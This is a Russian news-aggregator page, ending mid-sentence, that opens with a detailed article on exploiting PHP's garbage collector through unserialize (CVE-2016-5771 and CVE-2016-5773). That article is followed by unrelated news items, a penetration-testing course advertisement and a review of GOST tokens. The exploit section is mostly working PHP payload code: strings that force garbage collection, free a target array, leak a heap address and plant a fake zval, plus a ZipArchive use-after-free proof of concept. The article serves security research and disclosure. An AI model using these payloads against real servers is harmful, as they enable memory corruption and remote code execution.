
    Обратите внимание: алгоритм маркировки предполагает, что у каждого элемента может быть только один родительский элемент. Очевидно, в данном случае это предположение ошибочно.

    Так почему же один элемент может быть возвращён как дочерний для двух разных родителей?

    Один потомок двух разных родителей?
    Для ответа на этот вопрос нужно изучить, как дочерние zval’ы извлекаются из родительских объектов:
    "Zend/zend_gc.c"
    [...]
    static void zval_mark_grey(zval *pz TSRMLS_DC)
    {
    [...]
            if (Z_TYPE_P(pz) == IS_OBJECT && EG(objects_store).object_buckets) {
    	        if (EXPECTED(EG(objects_store).object_buckets[Z_OBJ_HANDLE_P(pz)].valid &&
    		             (get_gc = Z_OBJ_HANDLER_P(pz, get_gc)) != NULL)) {
    [...]
                        HashTable *props = get_gc(pz, &table, &n TSRMLS_CC);
    [...]
    }
    

    Если обработанный zval — объект, то функция вызовет специальный обработчик get_gc. Он должен возвращать хэш-таблицу со всеми потомками. После дальнейшей отладки я обнаружил, что это приводит к вызову spl_array_get_properties:
    "ext/spl/spl_array.c"
    [...]
    static HashTable *spl_array_get_properties(zval *object TSRMLS_DC) /* {{{ */
    {
    [...]
        result = spl_array_get_hash_table(intern, 1 TSRMLS_CC);
    [...]
        return result;
    }
    

    В общем, здесь возвращается хэш-таблица внутреннего массива ArrayObject. Ошибка в том, что она используется в двух разных контекстах, когда алгоритм пытается получить доступ:
    Вам может показаться, будто на первом этапе что-то упущено, ведь возврат хэш-таблицы inner_array — это почти то же самое, что обработка на первом этапе, когда он должен быть маркирован серым, поэтому inner_array не должен обрабатываться снова на втором этапе!

    Поэтому возникает вопрос: почему inner_array не был промаркирован серым на первом этапе? Давайте опять посмотрим, как zval_mark_grey извлекает потомков родительского объекта:

    HashTable *props = get_gc(pz, &table, &n TSRMLS_CC);
    

    Этот метод должен вызывать функцию сбора мусора объекта. Выглядит она так:
    "ext/spl/php_date.c"
    [...]
    static HashTable *date_object_get_gc(zval *object, zval ***table, int *n TSRMLS_DC)
    {
        *table = NULL;
        *n = 0;
        return zend_std_get_properties(object TSRMLS_CC);
    }
    

    Как видите, возвращённая хэш-таблица должна содержать только собственные свойства объекта. Также в ней хранится параметр zval’а table, который передан по ссылке и используется в качестве второго «возвращаемого параметра». Этот zval должен содержать все zval’ы, на которые ссылается объект в других контекстах. Например, все объекты/zval’ы могут храниться в SplObjectStorage.

    Для нашего специфического сценария с ArrayObject можно ожидать, что в zval table будет содержаться ссылка на inner_array. Тогда почему вместо spl_array_get_gc вызывается spl_array_get_properties?

    Отсутствующая функция сборщика и последствия этого
    Ответ прост: spl_array_get_gc не существует! Разработчики PHP забыли реализовать функцию сбора мусора для ArrayObjects. Но это всё равно не объясняет, почему вызывается spl_array_get_properties. Чтобы выяснить это, давайте разберёмся с инициализацией объектов вообще:
    "Zend/zend_object_handlers.c"
    [...]
    ZEND_API HashTable *zend_std_get_gc(zval *object, zval ***table, int *n TSRMLS_DC) /* {{{ */
    {
        if (Z_OBJ_HANDLER_P(object, get_properties) != zend_std_get_properties) {
            *table = NULL;
            *n = 0;
            return Z_OBJ_HANDLER_P(object, get_properties)(object TSRMLS_CC);
    [...]
    }
    

    Стандартное поведение отсутствующей функции сборки мусора зависит от собственного метода объекта get_properties, если он задан.

    Фух, кажется, мы нашли ответ на первый вопрос. Главная причина уязвимости: функции сбора мусора для ArrayObjects не существует.

    Довольно странно, что она появилась в PHP 7.1.0 alpha2 почти сразу после выхода. Получается, что уязвимости подвержены все версии PHP ≥ 5.3 и PHP < 7. К сожалению, как мы увидим далее, этот баг нельзя инициировать во время десериализации без дополнительных телодвижений. Так что позже пришлось подготовить возможность использования эксплойта. С этого момента мы будем называть уязвимость «баг двойного декрементирования». Она описана здесь: PHP Bug – ID 72433CVE-2016-5771.


    Нам ещё нужно получить ответы на два из трёх изначальных вопросов. Начнём с этого: действительно ли необходимо вручную вызывать gc_collect_cycles?Инициирование сборщика во время десериализации
    Сначала я сильно сомневался, что нам удастся инициировать сборщик. Однако, как уже говорилось выше, есть способ автоматического вызова сборщика мусора — при достижении лимита мусорного буфера по количеству потенциальных корневых элементов. Я придумал такой метод:
    define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
    define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
    $overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS);
    $trigger_gc_serialized_string = 'a:'.(NUM_TRIGGER_GC_ELEMENTS).':{'.$overflow_gc_buffer.'}';
    unserialize($trigger_gc_serialized_string);
    

    Если вы посмотрите на вышеописанный gdb, то увидите, что gc_collect_cycles действительно был вызван. Этот трюк работает лишь потому, что десериализация позволяет передавать один и тот же индекс много раз (в этом примере индекс 0). При повторном использовании индекса массива счётчик ссылок старого элемента должен декрементироваться. Для этого процесс десериализации вызывает zend_hash_update, который вызывает деструктор старого элемента.

    При каждом уничтожении zval’а применяется алгоритм СМ. Это означает, что все создаваемые массивы станут заполнять мусорный буфер до тех пор, пока он не переполнится, после чего будет вызван gc_collect_cycles.

    Невероятные новости! Нам не нужно вручную инициировать процедуру сбора мусора на целевой системе. К сожалению, возникла новая, ещё более трудная проблема.

    Десериализация — жёсткий оппонент
    На данный момент без ответа остался вопрос: даже если во время десериализации мы сможем вызвать сборщик, будет ли в контексте десериализации всё ещё работать баг двойного декрементирования?

    После тестирования мы быстро пришли к выводу, что ответ — нет. Это следствие того, что значения счётчиков ссылок всех элементов во время десериализации выше, чем после неё. Десериализатор отслеживает все десериализуемые элементы, чтобы можно было настраивать ссылки. Все эти записи хранятся в списке var_hash. И когда десериализация подходит к концу, записи уничтожаются с помощью функции var_destroy.

    В этом примере вы можете сами наблюдать проблему больших счётчиков ссылок:

    $reference_count_test = unserialize('a:2:{i:0;i:1337;i:1;r:2;}');
    debug_zval_dump($reference_count_test);
    /*
    Result:
    array(2) refcount(2){
      [0]=>
      long(1337) refcount(2)
      [1]=>
      long(1337) refcount(2)
    }
    */
    

    Счётчик целочисленного zval’а 1337 после десериализации равен 2. Установив точку прерывания до остановки десериализации (например, в вызове var_destroy) и сделав дамп содержимого var_hash, мы увидим такие значения счётчиков:
    [0x109e820] (refcount=2) array(2): {
        0 => [0x109cf70] (refcount=4) long: 1337
        1 => [0x109cf70] (refcount=4) long: 1337
      }
    

    Баг двойного декрементирования позволяет нам дважды декрементировать счётчик любого выбранного элемента. Однако, как мы видим по этим цифрам, за каждую дополнительную ссылку, присваиваемую любому элементу, нам приходится расплачиваться увеличением счётчика ссылок на 2.

    Лёжа в бессоннице в четыре утра и размышляя обо всех этих проблемах, я наконец вспомнил одну важную вещь: функция десериалиазиции ArrayObject принимает ссылку на другой массив для инициализации. То есть если вы десериализуете ArrayObject, то можете просто сослаться на любой массив, который уже десериализован. Это позволяет дважды декрементировать все записи конкретной хэш-таблицы. Последовательность действий такая:


    Используя эту инструкцию, мы можем манипулировать алгоритмом маркировки, чтобы дважды обработать все ссылки в массиве Y. Но, как упоминалось выше, создание ссылки приведёт к тому, что во время десериализации счётчик ссылок увеличится на 2. Так что двойная обработка ссылки будет равнозначна тому, как если бы мы изначально проигнорировали ссылку. Вся хитрость заключается в добавлении к нашей последовательности действий следующего пункта:
    Когда алгоритм маркировки перейдёт ко второму ArrayObject, он начнёт в третий раз декрементировать все ссылки в массиве Y. Теперь мы можем получить отрицательную дельту счётчика ссылок и обнулить счётчик любого целевого zval’а!

    Поскольку эти ArrayObject’ы используются для декрементирования счётчиков, я буду называть их теперь DecrementorObject’ами.

    К сожалению, даже после того как нам удалось обнулить счётчик любого целевого zval’а, алгоритм СМ их не освобождает…

    Уничтожение свидетельств декрементирования счётчика ссылок
    После длительных отладок я обнаружил ключевую проблему с вышеописанной последовательностью действий. Я предполагал, что, как только узел маркируется белым, он окончательно освобождён. Но оказалось, что белый узел позднее может быть снова маркирован чёрным.

    Вот что происходит при выполнении нашей последовательности действий:


    Итак, нам нужно как-то избавиться от свидетельств декрементирования. Также необходимо удостовериться, что счётчики наших DecrementorObject’ов обнулятся после завершения zval_mark_grey. После поиска наиболее простого решения я пришёл к выводу, что нужно изменить последовательность действий так:
      array( ref_to_X, ref_to_X,  DecrementorObject, DecrementorObject)
      -----                       ------------------------------------
    /*  |                                          |
    target_zval                     each one is initialized with the
        X                                 contents of array X
    */
    

    Преимущество изменений в том, что DecrementorObject’ы теперь декрементируют и свои собственные счётчики. Это поможет достичь состояния, когда целевой массив и все его потомки получат обнулённые счётчики, после того как gc_mark_roots обработает все zval’ы. Благодаря этой идее и дополнительным усовершенствованиям можно прийти к такому примеру:
    define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
    define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
    // Переполнение мусорного буфера.
    $overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS);
    // decrementor_object будет инициализирован с помощью содержимого целевого массива ($free_me).
    $decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}';
    // Следующие ссылки в ходе десериализации будут указывать на массив $free_me (id=3).
    $target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;';
    // Настроим целевой массив, т. е. массив, который должен быть освобождён в ходе десериализации.
    $free_me = 'a:7:{'.$target_references.'i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.'}';
    // Инкрементируем на 2 счётчик ссылок каждого decrementor_object.
    $adjust_rcs = 'i:99;a:3:{i:0;r:8;i:1;r:12;i:2;r:16;}';
    // Запустим сборщик мусора и освободим целевой массив.
    $trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}';
    // Добавим триггер СМ и ссылку на целевой массив.
    $payload = 'a:2:{'.$trigger_gc.'i:0;r:3;}';
    var_dump(unserialize($payload));
    /*
    Result:
    array(1) {
        [0]=>
        int(140531288870456)
    }
    */
    

    Как видите, больше не нужно вручную запускать gc_collect_roots! Целевой массив ($free_me в этом примере) освобождён, а также с ним произошёл ещё ряд странных вещей, так что в итоге у нас остался адрес кучи.

    Почему так случилось?

  • Сборщик был инициирован, целевой массив — освобождён. Затем сборщик был прерван, а контроль — возвращён десериализатору.
  • Освобождённое пространство будет перезаписано следующим zval’ом. Помните, что мы инициировали сборщик мусора с помощью многочисленных последовательных структур ‘i:0;a:0:{}’. Один из элементов запускает сборщик для следующего zval’а, создаваемого после ‘i:0;’, что является целочисленным индексом следующего массива, который будет определён. Иными словами, у нас есть строка ‘[…]i:0;a:0:{} X i:0;a:0:{} X i:0;a:0:{}[…]’, в которой произвольный X инициирует сборщик мусора. После этого продолжится десериализация данных, которые заполнят ранее освобождённое пространство.
  • Наше освобождённое пространство временно содержит этот целочисленный zval. Когда десериализация близка к завершению, будет вызвана функция var_destroy, которая освободит этот целочисленный элемент. Диспетчер памяти перезапишет первые байты освобождённого пространства адресом последнего освобождённого пространства. Однако тип последнего zval’а — целочисленный — сохранится.

  • В результате мы видим адрес кучи. Возможно, в этом не так просто разобраться с ходу, однако единственный важный вывод — в понимании, где инициируется сборщик и где генерируются новые значения для заполнения свежего освобождённого пространства.

    Теперь можно обрести контроль над ним.

    Контроль над освобождённым пространством
    Нормальная процедура контроля заключается в заполнении пространства фальшивыми zval’ами. С помощью висячего указателя вы можете потом устроить утечку памяти или управлять указателем команд процессора. В нашем примере для использования освобождённого пространства нужно сделать несколько вещей:
    Я не буду углубляться в детали, а лишь оставлю для вас этот POC:
    define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000);
    define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5);
    // Создаём строку фальшивого zval’а, которая позднее заполнит освобождённое пространство.
    $fake_zval_string = pack("Q", 1337).pack("Q", 0).str_repeat("\x01", 8);
    $encoded_string = str_replace("%", "\\", urlencode($fake_zval_string));
    $fake_zval_string = 'S:'.strlen($fake_zval_string).':"'.$encoded_string.'";';
    // Создаём «бутербродную» структуру:
    // TRIGGER_GC;FILL_FREED_SPACE;[...];TRIGGER_GC;FILL_FREED_SPACE
    $overflow_gc_buffer = '';
    for($i = 0; $i < NUM_TRIGGER_GC_ELEMENTS; $i++) {
        $overflow_gc_buffer .= 'i:0;a:0:{}';
        $overflow_gc_buffer .= 'i:'.$i.';'.$fake_zval_string;
    }
    // decrementor_object будет инициализирован с помощью содержимого целевого массива ($free_me).
    $decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}';
    // Следующие ссылки во время десериализации будут указывать на массив $free_me (id=3).
    $target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;';
    // Настроим целевой массив, т. е. массив, который должен быть освобождён в ходе десериализации.
    $free_me = 'a:7:{i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.$target_references.'}';
    // Инкрементируем на 2 счётчик ссылок каждого decrementor_object.
    $adjust_rcs = 'i:99999;a:3:{i:0;r:4;i:1;r:8;i:2;r:12;}';
    // Запустим сборщик мусора и освободим целевой массив.
    $trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS*2).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}';
    // Добавим триггер СМ и ссылку на целевой массив.
    $stabilize_fake_zval_string = 'i:0;r:4;i:1;r:4;i:2;r:4;i:3;r:4;';
    $payload = 'a:6:{'.$trigger_gc.$stabilize_fake_zval_string.'i:4;r:8;}';
    $a = unserialize($payload);
    var_dump($a);
    /*
    Result:
    array(5) {
    [...]
        [4]=>
        int(1337)
    }
    */
    

    В этом примере вы можете видеть, как после всех наших усилий удаётся создать искусственную целочисленную переменную.

    К этому моменту уже была готова полезная нагрузка для применения в эксплойте. Обратите внимание, что ради неё можно оптимизировать код. Например, ради минимизации размера полезной нагрузки применить «бутербродную» методику только для последних 20 % элементов ‘i:0;a:0:{}’.


    Другой уязвимостью, о которой мы сообщили в данном контексте, стала PHP Bug – ID 72434CVE-2016-5773. Она базируется на той же ошибке: нереализованной функции сбора мусора внутри класса ZipArchive. Однако использование этой уязвимости достаточно сильно отличается от уязвимости, описанной выше.

    Поскольку счётчики ссылок zval’ов временно декрементированы, любой побочный эффект (наподобие проверок ослабленных счётчиков) или прочие манипуляции могут привести к катастрофическим последствиям.

    Как раз в этом случае уязвимость можно использовать. Сначала мы позволяем алгоритму маркировки ослабить счётчики ссылок, а затем вместо правильной функции сбора мусора вызываем php_zip_get_properties. Тем самым мы освобождаем какой-то конкретный элемент. Посмотрите на пример:

    $serialized_string = 'a:1:{i:0;a:3:{i:1;N;i:2;O:10:"ZipArchive":1:{s:8:"filename";i:1337;}i:1;R:5;}}';
    $array = unserialize($serialized_string);
    gc_collect_cycles();
    $filler1 = "aaaa";
    $filler2 = "bbbb";
    var_dump($array[0]);
    /*
    Result:
    array(2) {
        [1]=>
        string(4) "bbbb"
    [...]
    */
    

    Нужно упомянуть, что в нормальных условиях невозможно создать ссылки на zval’ы, которые ещё не десериализованы. Эта полезная нагрузка использует небольшой трюк, позволяющий обойти ограничение:

    [...] i:1;N; [...] s:8:"filename";i:1337; [...] i:1;R:REF_TO_FILENAME; [...]

    Здесь создаётся запись NULL с индексом 1, которая позднее перезаписывается ссылкой на имя файла. Сборщик мусора увидит только “i:1;REF_TO_FILENAME; […] s:8:”filename”;i:1337; […]”. Этот трюк необходим для уверенности в том, что счётчик ссылок целочисленного zval’а “filename” был ослаблен, прежде чем начнут действовать какие-либо побочные эффекты.


    Подготовка этих багов к удалённому использованию была очень непростой задачей. Стоило решить одну проблему, как возникала новая. В статье мы рассмотрели один из подходов к решению достаточно сложной проблемы. Последовательно задавая себе продуманные вопросы, концентрируясь на постепенном получении каждого ответа и разбирая определения, мы наконец справились с трудностями и достигли цели.

    Было интересно понаблюдать за взаимодействием двух совершенно не связанных друг с другом PHP-компонентов: десериализатора и сборщика мусора. Лично я получил море удовольствия и многое узнал, анализируя их поведение. Так что могу порекомендовать вам воспроизвести всё вышесказанное для обучения. Это особенно важно: статья достаточно длинная, но даже в ней я не осветил ряд деталей.

    В сценарии применялся десериализатор, но можно обойтись и без него, по крайней мере для локального использования уязвимостей. Это отличает их от обычных, лежащих на поверхности уязвимостей, которые применялись для аудита десериализации в более ранних версиях PHP. В любом случае, как говорилось в начале статьи: никогда не прибегайте к десериализации с пользовательским вводом, а лучше опирайтесь на менее сложные методы вроде JSON.

    Эксперимент подтвердил, что мы можем использовать одну из обсуждённых уязвимостей для удалённого исполнения кода на pornhub.com. Это делает сборщика мусора в PHP интересным кандидатом для атаки.

    image
    Сборка мусора zval'ов пошла как-то не так.

    orig: 2016-08-24 11:11:50 / https://habrahabr.ru/post/308242/ (click post title)



    Российский суд вынес решение о блокировке несуществующей интернет-страницы

    Речь идет об уже запрещенной на сайте интернет-энциклопедии Lurkmore статье «Карикатуры на Мухаммеда».

    Роскомнадзор по решению Белоярского городского суда Ханты-Мансийского Автономного округа РФ запретил страницу 404, она же «Страница не найдена». Речь идет об уже запрещенной на сайте интернет-энциклопедии Lurkmore статье «Карикатуры на Мухаммеда». Об этом сообщил в Facebook соучредитель ресурса Давид Хомак.

    Как оказалось, сотрудники суда при составлении решения допустили ошибку при перепечатывании названия страницы из предписания Ленинского суда города Грозного от 4 декабря 2015 года. Тем не менее, решение суда даже с ошибкой является юридическим документом. В итоге Роскомнадзор направил в адрес ресурса уведомление с требованием удалить страницу с контентом, которого на самом деле уже не существует.

    В документе Ленинского суда имеется еще одна любопытная деталь. Судебная инстанция вынесла решение о блокировке ссылки http://lurkmore.to/ Карикатуры_на_Мухаммеда#1741, ведущей страницу с цитатой из пьесы Вольтера.

    Данный случай не единичен. Как отмечает Хомак, в минувшем июне Макушинский районный суд Курганской области принял решение о блокировке уже запрещенной статьи «Коктейль Молотова».

    Напомним, в июле текущего года Роскомнадзор по решению Октябрьского районного суда Ставрополя от 2013 года внес в список запрещенных сайтов ресурсы крупнейшего в мире поставщика SSL-сертификатов Comodo. Роскомнадзор сам является клиентом Comodo. Компания выдает SSL-сертификаты подсайтам ведомства, включая реестр запрещенного контента.

    orig: 2016-08-24 11:00:41 / http://www.securitylab.ru/news/483492.php (click post title)



    Крупнейший в даркнете порносайт стал эффективнее работать под управлением ФБР

    За две недели, пока Playpen находился под управлением ФБР, его средняя посещаемость в неделю возросла до 50 тыс. человек.

    В феврале 2015 года ФБР получило контроль над крупнейшим в «темной паутине» сайтом с детской порнографией Playpen. Однако вместо того, чтобы сразу же закрыть ресурс, агенты держали его активным еще в течение двух недель. За это время они инфицировали компьютеры посетителей Playpen вредоносным ПО с целью установить их личности.

    Как сообщает Motherboard, судя по представленным суду новым доказательствам по данному делу, пока сайт находился под контролем ФБР, его посещаемость существенно возросла, а пользователи даже стали отмечать в комментариях заметные улучшения в работе. По словам адвоката предполагаемого администратора Playpen, именно эти улучшения привели к росту популярности ресурса.

    «В течение порядка двух недель, по крайней мере до 4 марта 2015 года, ФБР предоставляло пользователям по всему миру возможность просматривать и загружать детскую порнографию и даже работало над улучшением работы сайта и добавлением в него новых возможностей», - заявил государственный защитник обвиняемого Питер Адольф (Peter Adolf).

    По словам Адольфа, за указанный период времени среднее число посетителей Playpen в неделю возросло с 11 тыс. до 50 тыс., а количество подписчиков увеличилось на 30%. За это время на сайте были опубликованы 200 видеороликов, 9 тыс. фотографий и 13 тыс. ссылок с детской порнографией.

    Согласно предоставленным защитником доказательствам, после получения агентами ФБР контроля над Playpen, пользователи стали жаловаться на медленную работу ресурса. Спустя два дня, кто-то от имени администрации написал о проделанной работе для улучшения производительности.

    «Правительственные агенты хорошо потрудились над улучшением функциональности сайта для быстрого и эффективного распространения детской порнографии, в результате чего еще больше пользователей стали получать порно быстрее, чем тогда, когда сайт работал ‘незаконно’», - заявил адвокат.    

    orig: 2016-08-24 10:49:05 / http://www.securitylab.ru/news/483491.php (click post title)



    Корпоративные лаборатории — актуальная программа обучения специалистов по информационной безопасности

    image

    Основными факторами, влияющими на развитие рынка ИБ, как и прежде, являются возрастающее количество инцидентов, нарушающих функционирование бизнес-процессов. В свете этого вполне понятен рост интереса к таким услугам, как построение систем ИБ, а также создание систем управления инцидентами и непрерывностью функционирования.

    Количество и уровень информационных угроз возрастает с каждым днем, соответственно все сложнее становятся системы защиты информации, их внедрение и эксплуатация, а также требования к специалистам по информационной безопасности для возможности противодействия современным угрозам.

    Разрабатывая уникальные по своему формату и методике обучения курсы «Корпоративные лаборатории» наши специалисты помогают восполнить недостающие знания и усовершенствовать свои навыки по построению эффективной системы защиты информационных систем от несанкционированных атак злоумышленников. Даже опытные специалисты, посетившие наши программы обучения, открывают для себя что-то новое. Уникальность программы заключается не только в актуальном практическом материале, но и в методике обучение с применением специально разработанных для данной программы ресурсов.

    Программа курса выгодно отличается от зарубежных аналогов своей актуальностью — адаптация и перевод наиболее известных западных программ обучения занимает довольно продолжительное время и запаздывает в актуальности приблизительно на год.

    Процесс обучения
    Обучение проходит полностью дистанционно, и состоит на 20% из теоретической части и на 80% из практической (в виде специально разработанной уникальной лаборатории тестирования на проникновение). Теоретическая часть представлена в виде вебинаров, в полном интерактиве с инструктором. На протяжении всей программы обучения существует возможность ознакомится с видеозаписями прошедших вебинаров для лучшего закрепления материала. Все вебинары дополнены подробными методическими пособиями. В качестве бонуса на завершающий вебинар мы приглашаем известных людей из мира практической информационной безопасности, для того чтобы они поделились интересным материалом, наработками или практическими кейсами.

    Процесс обучения проходит поэтапно и выглядит следующим образом: специалист после каждой группы онлайн-вебинаров выполняет практические задания в специализированной лаборатории тестирования на проникновение, тем самым закрепляя полученные знания на практике.

    На протяжении всего обучения группу сопровождает куратор, который оперативно помогает обучающимся со всеми возникающими вопросами.

    После того как все задания в практической лаборатории будут успешно завершены, специалисту предлагается выполнить финальное тестирование.

    Уникальность курсов заключается также и в возможности выступить в роли злоумышленника, что в корне может поменять представление об эффективном построении систем защиты. Акцент обучения ставится на практике действиях специалистов, что составляет 80 % обучения. В 20% материала мы вкладываем самую актуальную информацию об инструментах современных атак, эксплуатацию средств взлома и недавно зафиксированных векторах и сценариях хакерских атак.

    Новая программа
    C каждым набором наши специалисты актуализируют учебный материал исходя из трендов развития современных угроз и средств противодействия злоумышленникам. В программу текущего набора мы включили обновленный материал по следующим темам:

    «Актуальные векторы атак: APT» — появилось большое количество нового материала, в т.ч. ProjectSauron — средство атаки госучреждений РФ, анализ утечка данных и инструментария Equation Group.

    «Актуальные векторы атак: BYOD» — новые уязвимости и векторы атак, например Quadrooter (уязвимы ~ 900.000.000 устройств на базе Android).

    «Пост‐эксплуатация в Windows системах. Powershell» Сегодня PowerShell это платформа для реализации практических безграничных возможностей. Как для системного администрирования, так и для наступательной информационной безопасности. Нельзя забывать и о том, что злоумышленники всё чаще и чаще используют встроенные в ОС фукнционал, и всё реже стараются загружать свой собственный инструментарий. Поэтому просто необходимо как минимум знать и уметь пользоваться хотя бы базовыми возможностями PowerShell в сегодняшнем, крайне динамично меняющиеся мире.

    Отдельное внимание так же заслуживает тот факт, что долгое время антивирусные продукты совершенно не обращали внимание на зловредные PowerShell скрипты. Сейчас ситуация уже начала меняться, но обход систем проактивной защиты до сих пор достаточно несложен.

    «Актуальные уязвимости современных веб-систем.» Сейчас разработчики стараются добавить в свои веб-приложения как можно больше различного функционала и зачастую теперь веб-приложения являются сложными системами в состав которых входят различные компоненты. Параллельно с развитием и усложнением веб-приложений видоизменялись старые векторы атак, и, что немаловажно, появлялись новые. Также важно отметить то, что не всегда можно найти уязвимости просто просканировав веб-приложение различными сканерами.

    «Форензика мобильных устройств.» Довольно актуальная тема, сейчас в мобильных устройствах хранится и обрабатывается большой объем критичных данных — от личной почты до онлайн банкинга и реквизитов доступа в корпоративную сеть. Поэтому необходимо иметь представление о структурах приложениях, архитектуре безопасности в мобильных ОС и средствах защиты.

    В качестве примера предлагаем ознакомиться с видеозаписью по построению зашифрованного командного управления через DNS используя утилиту dnscat2:

    Резюме
    Осознавая критичность защиты внутреннего периметра систем, серьезность последствий от несанкционированного доступа к конфиденциальной информации и глубину ответственности, которая ложится на специалистов по ИБ, мы разработали особую программу профессиональной подготовки «Корпоративные лаборатории Pentestit», уникальность которой заключается в симбиозе формата обучения, качества материала и специализированных ресурсов, на которых производится обучение:
    • обучение построено по принципу: 20% теории (вебинары) и 80% практики (работа в пентест-лаборатории). Опыт показывает, что именно такое соотношение позволяет максимально эффективно производить процесс обучения.;
    • вебинары читают специалисты с богатым практическим опытом работы в области ИБ;
    • все лаборатории разрабатываются на основе современных уязвимостей, обнаруженных в результате пентеста реальных компаний в обезличенном виде;
    • на протяжении всего процесса обучения группу сопровождает куратор, помогающий справиться с заданием, если возникнет необходимость. Важно отметить, что основной задачей куратора является не объяснить выполнение, а научить мыслить так, чтобы справиться с заданием самостоятельно;
    • каждый новый набор включает обновленный и дополненный материал, что позволяет поддерживать программу в актуальном состоянии на момент обучения;
    • все ресурсы, используемые в программах (личный кабинет, вебинар-площадка и лаборатории) являются собственной разработкой Pentestit и реализованы с учетом всех потребностей обучающихся.

    Таким образом, корпоративные лаборатории позволяют в кратчайшие сроки понять психологию злоумышленника, освоить современные техники тестирования на проникновения и инструментарий. Понимание того, что может представлять угрозу системам, а что — нет, позволяет разрабатывать наиболее эффективные механизмы защиты. Кроме этого, программы обучения закладывают качественные вектора для дальнейшего развития сотрудников.

    Приглашаем специалистов, желающих повысить свои навыки и уровень знаний на курсы профессиональной подготовки «Корпоративные лаборатории Pentestit».

    Продолжительность 29 дней. Ближайший курс 02.10.2016.

    orig: 2016-08-24 10:37:06 / https://habrahabr.ru/post/307850/ (click post title)



    Сервис стриминга игр PlayStation Now выйдет для компьютеров

    SONY наконец объявила, что выпустит сервис стриминга игр PlayStation Now для PC под управлением Windows. Также обещается адаптер USB который позволит использовать контроллер PlayStation 4  на PC.

    В настоящее время PlayStation Now совместим с PlayStation 4 и некоторыми телевизорами Sony. На компьютерах приложение станет доступно в Европе в ближайшее время и чуть позже в Северной Америке, утверждает Sony в своем блоге. Подписка на месяц будет стоить в районе 20 долларов, однако в первые 7 дней сервис можно будет опробовать бесплатно. 

    Кроме этого, в начале сентября Sony выпустит беспроводной USB-адаптер для DualShock 4, позволяющий подключить контроллер к вашему компьютеру. Стоить на момент релиза он будет 24.99 долларов.

    Минимальные требования PC для работы PlayStation Now:

    orig: 2016-08-24 10:28:57 / https://www.anti-malware.ru/news/2016-08-24/20765 (click post title)



    Разработан инструмент для восстановления контента, зашифрованного вымогателем Wildfire

    Вредонос шифровал файлы на компьютере и требовал выкуп в 1,5 биткойна за их восстановление.

    Специалисты компаний Intel Security и «Лаборатория Касперского» объявили о выпуске инструмента для восстановления файлов, зашифрованных вымогательским ПО Wildfire. Утилита доступна на сайте NoMoreRansom.

    По данным исследователей, жертвами вредоносной кампании стали в основном жители Бельгии и Нидерландов. В ходе операции злоумышленники распространяли электронные письма якобы от транспортных компаний с сообщением о пропущенной поставке и просьбой запланировать новые поставки, заполнив прилагаемую форму. На деле вложение содержало обфусцированный дроппер, который инфицировал систему жертвы трояном Wildfire.

    Вредонос шифровал файлы на компьютере и требовал выкуп в 1,5 биткойна за их восстановление. Судя по всему, операторы трояна шли навстречу жертвам, поскольку большинство из них перечисляли суммы в размере 0,5-0,6 биткойнов. За последние 30 дней кампании злоумышленники заработали в общей сложности 136 биткойнов (порядка €70,332 тыс.). По словам экспертов, некоторые свидетельства указывают на то, что разработчиками Wildfire могут быть хакеры из Восточной Европы.

     

    orig: 2016-08-24 09:57:32 / http://www.securitylab.ru/news/483490.php (click post title)



    Токены с поддержкой ГОСТ

    Несколько лет назад делал обзор доступных на тот момент токенов с поддержкой алгоритмов ГОСТ. Вместе с небольшим историческим экскурсом был представлен краткий обзор имеющихся тогда на рынке четырёх решений — eToken ГОСТ, iBank 2 Key, Rutoken ЭЦП и ШИПКА-1.6. В конце поста была размещена сводная таблица со сравнением, но она, к сожалению, за давностью лет уже утрачена.

    Решил, что эта утрата, равно как и сама давность лет — хороший повод сделать новую сводную таблицу, тем более, что ситуация за прошедшие с момента прошлого поста 4,5 года существенно поменялась.

    Изначально планировал в качестве сравниваемых выбрать только токены (USB-ключи и смарт-карты), присутствующие в перечне ФСБ на их официальном сайте, но оказалось, что часть выданных сертификатов в нём по какой-то причине отсутствуют. Пришлось принимать на веру те сертификаты, которые производители сами разместили на своём сайте. Остальную техническую информацию также брал с их сайтов. К сожалению, не все раскрывают подробности детально, так что в некоторых ячейках пришлось проставить н/д, хотя, не исключаю, что где-то в недрах документации можно найти больше деталей. Отдельное спасибо коллегам из ООО «ИСУБ» (ISBC group) и, особенно, ЗАО «Актив-софт» — про предлагаемые ими решения рассказали в деталях и ответили на дополнительные вопросы. Компании ООО «МультиСофт Системз» и ЗАО «АЛАДДИН Р.Д.» мои запросы проигнорировали.

    Состав участников в итоговой таблице получился совсем иной, чем в прошлый раз. Сертификаты ФСБ на изделия ШИПКА и iBank 2 Key уже давным давно закончились и, судя по всему, продлевать их никто не собирается. Зато появились и принципиально новые решения: ESMART Token ГОСТ и MS_KEY K. Про первое я ещё что-то слышал, а вот про второй узнал впервые.

    Компания Актив к уже имеющемуся Рутокен ЭЦП сертифицировала ещё и Рутокен ЭЦП 2.0 (основное отличие — поддержка новых алгоритмов: ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012).

    Наконец, в сертификате на Криптотокен ЭП помимо упоминания eToken ГОСТ появилось и упоминание JaCarta ГОСТ. К слову, в плане сертификации это самый запутанный из всех вариантов — сертификат выдан на:

